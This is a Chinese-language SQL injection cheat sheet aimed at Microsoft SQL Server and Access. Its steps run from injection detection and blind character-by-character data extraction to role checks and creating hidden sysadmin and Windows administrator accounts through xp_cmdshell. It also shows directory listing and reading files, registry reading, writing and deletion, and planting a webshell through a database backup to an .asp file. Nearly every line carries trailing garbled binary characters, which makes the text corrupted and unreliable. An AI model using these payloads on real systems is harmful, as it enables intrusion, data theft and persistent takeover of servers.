1.判断是否有注入;and 1=1 ;and 1=2 (/P-9<�"�U
2.初步判断是否是mssql ;and user>0 ZI!�;���~q
ML�m�k=&d�
3.注入参数是字符'and [查询条件] and ''=' Y=UN`vR��R
h�9%.t�G�x
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �1(VskFtZF
/5XdZu6k`h
5.判断数据库系统 0NSCeq%;6q
��J�e#�3 �
;and (select count(*) from sysobjects)>0 mssql lb�)i0`AN+
e��A9r M:�
;and (select count(*) from msysobjects)>0 access p�AtxEaXh�
F�xX��nX
i�?F��~]8
y=��1(o3(�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ,ce$y4%��(
7�w�s[�Rp8
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 B��/E�GaYH
{RH�)&k&�%
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ;s�SRv9Xb
\D�! I�"mr
9.(1)猜字段的ascii值(access) %G]�W�Oq=q
P�9#�}aw�+
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 <
$�r��X�Q
�J��\ ���?
(2)猜字段的ascii值(mssql) ][�T>05�2v
q�[.,i{2R}
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �qUN�XT���
p#dYNed]�'
10.测试权限结构(mssql) 04E#d.o�'�
e0�o)J�o.P
�h`:�g�Mhn
}4*~*N��oQ
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ,x�C@��@>f
=��NL(���L
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- wIQt
f|ZI>
M0MvOO*a�d
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- DM ���!B@
Y#P�g*C8>8
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- A@�G%*\�UZ
^<�e��(3S:
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �VSm{�]Z!x
Gp�lEa�d
$
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1��4Jkr)�N
w�5Y�t mnP
;and 1=(select IS_MEMBER('db_owner'));-- xNxSgvco�,
H[iR8�<rhQ
��+r]��2.
vj�<J�jG�P
11.添加mssql和系统的帐户 ?7ae�Y5�p
0a's[�>-'A
;exec master.dbo.sp_addlogin username;-- 5q.)�K�
f+
;exec master.dbo.sp_password null,username,password;-- z�Ad%�dbU|
��)>^!X$`3
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �"[�\TL�#/
?xCWg.#l4V
;exec master.dbo.xp_cmdshell 'net user username password #�6Fc-ysk:
14�0_�WV?7
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �y�gT�c�
Y
�]AB4w+6!�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��D3;#���:
�p�!��~V@l
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �X�~g~U|B@
V�0F�&a~Q�
�~�fF;GtP
�iXuSFma�n
12.(1)遍历目录 �H}}C>p"!,
'W�J3q|o/
;create table dirs(paths varchar(100), id int) Id�WFG?b3
0\yA�6�`}!
;insert dirs exec master.dbo.xp_dirtree 'c:\' +Rd;>s*.Y�
-f8iq��[F5
;and (select top 1 paths from dirs)>0 �V�5HK6-�T
'��u4TI=[6
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;��Z{j��ol
��sb*)K�,U
=E-V-?N��\
]�9NA3U7F
(2)遍历目录 �`�KmM*�_a
�~�~3� BV,
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- xE��qr3(�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 R"qxT��.P(
E(Y}*.\]#s
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Xl�U`j��v+
�W� v!%'IB
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ]*vv=@"�`e
4�xD`��Z_U
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �:5BVVa0oR
a}/��A]mu�
8{4jlL;"`?
}�:hN}�*H�
13.mssql中的存储过程 �mvt%3zCB!
v�,A8Mk2s#
xp_regenumvalues 注册表根键, 子键 �PFPZ]XI%F
J`d;I#R�%c
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 .��_U��S8
% ��(x9~"�
xp_regread 根键,子键,键值名 Y��S+|n%?
zq�a7�!ky�
;exec xp_regread �FWDAG$K@0
C{U"Nsu+1�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 jk�fc=O6�^
RD0=\!w�*5
xp_regwrite 根键,子键, 值名, 值类型, 值 8�("�"ui�8
�pt=H?{0�6
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ]�}�0�Q�rD
&Z�6s\r�%�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 tk�Ki�uh?m
C0�%yGLh�&
xp_regdeletevalue 根键,子键,值名 S�K;c
D�>)
�o==��:e��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 p�5\B�0G<m
�@pO2A6�Ks
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 4�|Ay;}X \
�I7e�.p�m�
.FpeVjR�''
?I332�,,q�
14.mssql的backup创建webshell T43�Jg�k�,
G��EUC<bL+
use model S<�UWv@`U"
�0;2"X��[e
create table cmd(str image); Y2Y)|�<F�H
%,�Lv},%Y
insert into cmd(str) values (''); M�.�?[Xpa�
B6x�M��#)�
backup database model to disk='c:\l.asp'; oZ�,_�G,b^
sA!���$}W�
2c1L[�]h'�
=`Lci1#pu}
15.mssql内置函数 �u+5M�rS�[
�O�V,�t|��
;and (select @@version)>0 获得Windows的版本号 1��pa�LxR5
b�.|k ��j
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �Lv���m"!!
)uu1AbT�+e
;and (select user_name())>0 爆当前系统的连接用户 T1�=�����T
�2v?fbrC5c
;and (select db_name())>0 得到当前连接的数据库 �
�{B���w
(rm*�K�D"]
�M2l�v�D�&
:kQ�yd�CuK
16.简洁的webshell 2�R��];Pv�
8(ej]9RObU
use model lgQ�"K�(zY
chA7R'+L�A
create table cmd(str image); Xli$4 uL
�
a|eHo%�Qt
insert into cmd(str) values (''); VMIX=gT��Z
7���-# �
backup database model to disk='g:\wwwtest\l.asp';
